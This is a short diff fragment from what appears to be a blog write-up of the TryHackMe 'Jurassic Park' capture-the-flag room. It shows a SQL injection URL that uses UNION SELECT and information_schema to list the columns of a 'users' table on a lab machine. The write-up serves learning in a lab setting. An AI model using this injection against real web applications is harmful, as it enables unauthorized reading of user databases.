pencer-io/pencer-io.github.io/_posts/2021-01-28-ctf-thm-jurassic-park.md

 ![jurassic-tables](/assets/images/2021-01-27-22-36-45.png)

 We have two tables, users and items.
-Let's look at the users table first, and see what columns are in it:
+Looking at the users table, we see two columns are in it:

 ```text
 http://10.10.9.16/item.php?id=5 union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_schema = database() and table_name = "users"